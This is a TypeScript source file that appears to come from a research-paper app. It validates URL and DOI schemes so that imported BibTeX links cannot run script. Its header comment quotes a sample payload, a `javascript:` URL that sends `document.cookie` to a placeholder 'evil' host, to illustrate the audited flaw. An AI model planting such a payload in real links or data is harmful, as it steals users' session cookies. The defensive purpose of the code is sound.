/**
 * Scheme validation for externally-sourced links (MEDIUM-5, audit 2026-07-28).
 *
 * `paper.url` and `paper.doi` are populated from BibTeX imports
 * (`bibtex_service.py`) and Zotero/Mendeley items — all external and
 * attacker-influenceable. A `.bib` from a shared lab folder containing
 * `url = {javascript:fetch('https://evil/'+document.cookie)}` rendered straight
 * into an `href` gives one-click script execution in the app origin, and
 * `rel="noopener noreferrer"` does nothing against `javascript:`.
 *
 * Returns `undefined` for anything that isn't http/https so callers can render
 * plain text instead of a live link. An `<a>` with no `href` is not a link, so
 * a dropped value degrades visibly rather than silently pointing somewhere else.
 */

const SAFE_PROTOCOLS = new Set(["http:", "https:"]);

export function safeExternalHref(raw: string | null | undefined): string | undefined {
  if (!raw) return undefined;

  const trimmed = raw.trim();
  if (!trimmed) return undefined;

  let parsed: URL;
  try {
    // No base: a relative value has no business in an external link, and
    // resolving one against the app origin would mask a malformed URL.
    parsed = new URL(trimmed);
  } catch {
    return undefined;
  }

  return SAFE_PROTOCOLS.has(parsed.protocol) ? trimmed : undefined;
}

/**
 * Resolve a paper's DOI field to a safe href.
 *
 * A bare DOI ("10.1234/xyz") becomes a doi.org URL; anything else is treated as
 * a raw URL and scheme-checked. The DOI column is free text and carries full
 * URLs in practice, so it needs the same guard as `paper.url`.
 */
export function safeDoiHref(doi: string | null | undefined): string | undefined {
  if (!doi) return undefined;
  const trimmed = doi.trim();
  if (!trimmed) return undefined;

  if (trimmed.startsWith("10.")) {
    return `https://doi.org/${encodeURI(trimmed)}`;
  }
  return safeExternalHref(trimmed);
}
